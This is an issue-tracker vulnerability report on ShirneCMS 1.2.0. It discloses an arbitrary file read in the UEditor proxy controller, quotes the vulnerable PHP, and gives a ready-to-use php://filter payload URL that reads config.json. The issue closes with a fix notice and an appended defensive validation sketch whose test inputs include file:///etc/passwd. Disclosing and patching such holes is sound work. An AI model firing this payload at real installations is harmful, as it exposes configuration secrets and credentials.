
语辰软件 / ShirneCMS


shirne-1.2.0 has a path traversal bug

Completed
Bug
Created on 2022-07-31 15:39

This CMS uses UEditor (a rich text editor), which is developed by Baidu (Top 100 Global Enterprises), and after the author's secondary development an arbitrary file read vulnerability has occurred. Details are as follows.

In the file /static/ueditor/php/controller.php, the author added the proxy function, which causes the path traversal problem and could read any file on the system with the CMS installed.

controller.php

```php
if(strlen($data) > 100){
    header("Content-type: image/jpeg");
    if($maxwidth > 0){
        $image = imagecreatefromstring($data);
        if($image){
            $width = imagesx($image);
            $height = imagesy($image);
            $sw=0;
            if($width > $height){
                if($width > $maxwidth){
                    $sw = $maxwidth;
                    $sh = $height * $sw / $width;
                }
            }else{
                if($height > $maxwidth){
                    $sh = $maxwidth;
                    $sw = $width * $sh / $height;
                }
            }
            if($sw > 0){
                $newimage = imagecreatetruecolor($sw,$sh);
                imagecopyresampled($newimage, $image, 0, 0, 0, 0, $sw, $sh, $width, $height);

                imagejpeg($newimage,null,70);
                imagedestroy($newimage);
            }else{
                imagejpeg($image,null,70);
            }
            imagedestroy($image);
        }
    }else{
        echo $data;
    }
}
```

Payload:

http://localhost/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode|convert.base64-encode|convert.base64-encode|convert.base64-encode|convert.base64-encode|convert.base64-encode/resource=config.json&maxwidth=-1&referer=test

After base64-decoding several times, you can see the real content.
If the author sees this message, I hope you fix the vulnerability as soon as possible.

Comments (1)

HacKerQWQ created the issue
HacKerQWQ edited the description

This issue has been fixed in f83be2d

You can copy these files to override yours.

shirne changed the task status from Pending confirmation to Completed
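
One way to close the two gaps the report describes (a `remote` value that reaches a stream function with a non-HTTP scheme, and the `echo $data` branch that returns raw bytes) is sketched below as an added example; it is not ShirneCMS code and not the change made in f83be2d. The function names, the host allowlist and the sample inputs are assumptions constructed for illustration.

```php
<?php
// Added example: not ShirneCMS code and not the f83be2d change.
// Function names and the host allowlist are hypothetical.

// Return the URL if it is safe to hand to an HTTP client, otherwise null.
function validate_proxy_remote(string $remote, array $allowedHosts): ?string
{
    // Whitespace, control bytes and the filter-chain separator are never valid here.
    if ($remote === '' || preg_match('/[\x00-\x20|]/', $remote)) {
        return null;
    }
    $parts = parse_url($remote);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null; // bare or relative paths such as config.json stop here
    }
    // Scheme allowlist: php://, file://, data:// and phar:// all fail this test.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null; // no embedded credentials
    }
    return in_array(strtolower($parts['host']), $allowedHosts, true) ? $remote : null;
}

// Only bytes that parse as an expected image type may be echoed to the client.
function is_allowed_image(string $data): bool
{
    $info = @getimagesizefromstring($data);
    return $info !== false
        && in_array($info['mime'], ['image/jpeg', 'image/png', 'image/gif'], true);
}

// Constructed samples: [input, whether it should be accepted].
$hosts = ['img.example.com'];
$cases = [
    ['https://img.example.com/a.jpg', true],
    ['php://filter/convert.base64-encode/resource=config.json', false],
    ['file:///etc/passwd', false],
    ['config.json', false],
    ['https://other.example.net/a.jpg', false],
];
foreach ($cases as [$url, $expected]) {
    $ok = validate_proxy_remote($url, $hosts) !== null;
    printf("%-58s %s\n", $url, $ok === $expected ? 'ok' : 'MISMATCH');
}
$gif = base64_decode('R0lGODlhAQABAIAAAAAAAP///ywAAAAAAQABAAACAUwAOw==');
var_dump(is_allowed_image($gif));              // constructed 1x1 GIF
var_dump(is_allowed_image('{"db":"secret"}')); // constructed non-image bytes
```

A host allowlist does not by itself stop an allowed host from redirecting elsewhere, so the HTTP client that performs the fetch should also have redirects disabled or re-validated.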
